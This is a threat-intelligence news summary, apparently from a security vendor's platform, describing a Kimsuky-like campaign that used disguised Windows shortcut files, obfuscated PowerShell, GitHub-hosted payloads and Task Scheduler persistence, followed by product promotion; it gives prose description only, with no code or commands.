Attackers distributed malicious Windows shortcut (.LNK) files disguised as privacy consent forms and other work-related documents, tricking users into launching obfuscated PowerShell that fetched additional payloads from external infrastructure. Reporting indicates GitHub was used as a covert stage in the infection chain, helping operators blend malicious downloads and command retrieval into legitimate web traffic while keeping much of the activity fileless and in memory.
Once executed, the malware created downloader and loader scripts, established persistence through Windows Task Scheduler, opened decoy documents to reduce suspicion, and deleted the original shortcut to limit forensic artifacts. Observed follow-on payloads included an information stealer and a backdoor loader that decrypted and loaded malware into memory; the theft activity gathered host, security product, network, IP, drive, file, and process data, with behavior resembling prior Kimsuky-linked operations.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
2 events from the most recent confirmed update back to the earliest known activity.
AhnLab ASEC published analysis of a malware campaign using Windows shortcut files disguised as privacy consent forms and other work-related documents. The LNK files executed obfuscated PowerShell, downloaded additional payloads filelessly, established persistence via Task Scheduler, and in some cases deployed information-stealing and backdoor components linked by behavior to prior Kimsuky activity.
Infosecurity Magazine reported on a multi-stage malware campaign that used GitHub as a covert channel for malware delivery and control.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
3 references tracked. Mallory keeps watching after this page renders.
asec.ahnlab.com
Open sourceasec.ahnlab.com
Open sourceinfosecurity-magazine.com
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.